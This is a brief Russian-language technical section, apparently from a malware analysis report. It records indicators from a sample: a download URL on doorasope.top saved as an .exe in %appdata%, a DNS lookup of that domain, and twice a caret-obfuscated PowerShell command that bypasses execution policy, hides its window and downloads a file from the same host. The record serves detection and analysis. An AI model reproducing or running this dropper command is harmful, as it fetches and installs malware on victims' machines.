Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWerS^HeLL.E^X^e -^E^xE^CUti^o^NPO^L^IcY bYPA^ss -nOpR^oF^ILe^ -wiNDOw^stY^lE^ h^I^ddE^N (new-ObjEc^t ^sysTEm^.ne^t^.w^ebCLiE^Nt).DoW^Nl^OAdF^i^L^E('http://www.doorasope.top/r...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POWerS^HeLL.E^X^e -^E^xE^CUti^o^NPO^L^IcY bYPA^ss -nOpR^oF^ILe^ -wiNDOw^stY^lE^ h^I^ddE^N (new-ObjEc^t ^sysTEm^.ne^t^.w^ebCLiE^Nt).DoW^Nl^OAdF^i^L^E('http://www.doorasope.top/r...' (со скрытым окном)